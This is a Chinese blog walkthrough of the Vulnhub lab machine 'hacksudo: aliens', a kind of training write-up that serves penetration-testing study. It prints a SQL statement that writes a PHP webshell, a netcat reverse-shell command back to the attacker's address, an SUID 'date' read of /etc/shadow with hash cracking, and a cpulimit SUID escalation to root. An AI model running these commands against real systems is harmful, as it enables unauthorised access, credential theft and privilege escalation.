首页 > 其他分享 >Vulnhub: hacksudo: aliens靶机

Vulnhub: hacksudo: aliens靶机

时间:2023-08-03 18:22:39浏览次数:45  
标签:shell suid hacksudo aliens 111.175 192.168 gtfobins Vulnhub

kali:192.168.111.111

靶机:192.168.111.175

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.175

image

目标80端口backup目录存在文件mysql.bak,下载后查看获得mysql账号密码

image

image

登录9000端口的phpmyadmin,执行sql语句写入webshell

select '<?php system($_GET["cmd"]);?>' into outfile '/var/www/html/shell.php' 

image

成功执行命令

http://192.168.111.175/shell.php?cmd=id

image

获得反弹shell

http://192.168.111.175/shell.php?cmd=nc -e /bin/bash 192.168.111.111 4444

image

提权

查找suid权限的文件

find / -perm -u=s 2> /dev/null

image

利用方法:https://gtfobins.github.io/gtfobins/date/#suid

image

查看/etc/shadow文件,利用john爆破用户密码密文

/usr/bin/date -f /etc/shadow

image

echo '$6$cOv4E/VKAe0EVwV4$YScCx10zfi7g4aiLY.qo8QPm2iOogJea41mk2rGk/0JM5AtnrmiyTN5ctNJ0KTLS5Iru4lHWYPug792u3L/Um1' > hash

john hash --wordlist=/usr/share/wordlists/rockyou.txt

image

切换到hacksudo用户后查看suid权限的文件

find / -perm -u=s 2> /dev/null

image

利用方法:https://gtfobins.github.io/gtfobins/cpulimit/#suid

image

提升为root

/home/hacksudo/Downloads/cpulimit -l 100 -f -- /bin/sh -p

image

flag

image

标签:shell,suid,hacksudo,aliens,111.175,192.168,gtfobins,Vulnhub
From: https://www.cnblogs.com/ctostm/p/17604124.html

相关文章

  • Vulnhub: BlueMoon: 2021靶机
    kali:192.168.111.111靶机:192.168.111.174信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.17480端口目录爆破,发现文件:hidden_textgobusterdir-uhttp://192.168.111.174-w/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-m......
  • vulnhub_DC_6_wp
    前言靶机地址:https://www.vulnhub.com/entry/dc-6,315/靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip攻击机地址:192.168.20.135靶机探测nmap-sn192.168.20.0/24192.168.20.149为靶机地址端口扫描nmap-p-192.168.20.149详细信息扫描nmap-A-p22,80192.......
  • Vulnhub: Wayne Manor:1靶机
    kali:192.168.111.111靶机:192.168.111.172信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.172根据提示修改hosts文件访问目标80,在主页发现三组数字,结合端口扫描的结果中21端口被过滤,猜测存在端口碰撞knock-v192.168.111.172300350400......
  • Vulnhub: shenron:3靶机
    kali:192.168.111.111靶机:192.168.111.171信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.171修改hosts后访问目标80端口,发现是wordpresswpscan收集目标用户,爆破出密码:iloverockyouwpscan--urlhttp://shenron/-euwpscan--urlhttp://......
  • Vulnhub: hacksudo: search靶机
    kali:192.168.111.111靶机:192.168.111.170信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.17080端口目录爆破feroxbuster-k-d1--urlhttp://192.168.111.170-w/opt/zidian/SecLists-2022.2/Discovery/Web-Content/directory-list-lower......
  • Vulnhub: Coffee Addicts:1靶机
    kali:192.168.111.111靶机:192.168.111.158信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.158访问80端口提示添加域名到hosts文件目录爆破,发现wordpress目录feroxbuster-k-d1--urlhttp://coffeeaddicts.thm-w/opt/zidian/SecLists-2......
  • Vulnhub: HackathonCTF: 2靶机
    kali:192.168.111.111靶机:192.168.111.147信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.147ftp存在匿名登陆,其中存在字典文件80端口目录爆破feroxbuster-k-d1--urlhttp://192.168.111.147-w/opt/zidian/SecLists-2022.2/Discover......
  • Vulnhub之Dhanush靶机测试过程
    Dhanush识别目标主机IP地址(kali㉿kali)-[~/Vulnhub/dhanush]└─$sudonetdiscover-ieth1-r192.168.187.0/24Currentlyscanning:Finished!|ScreenView:UniqueHosts......
  • Vulnhub: Hackable:II靶机
    kali:192.168.111.111靶机:192.168.111.142信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.142网站的files目录ftp存在匿名登录,所在目录为网站的files目录ftp上传反弹shell提权目标根目录下的.runme.shmd5解密后切换到shrek用户s......
  • vulnhub-BossPlayersCTF
    vulnhub-BossPlayersCTF目标IP:192.168.1.103官方难度:简单攻击机器:macOS+kali混搭信息收集端口扫描开放端口扫描nmap-sT-T4-p-192.168.1.103扫描结果StartingNmap7.93(https://nmap.org)at2023-06-0423:10CSTNmapscanreportfor192.168.1.103Hosti......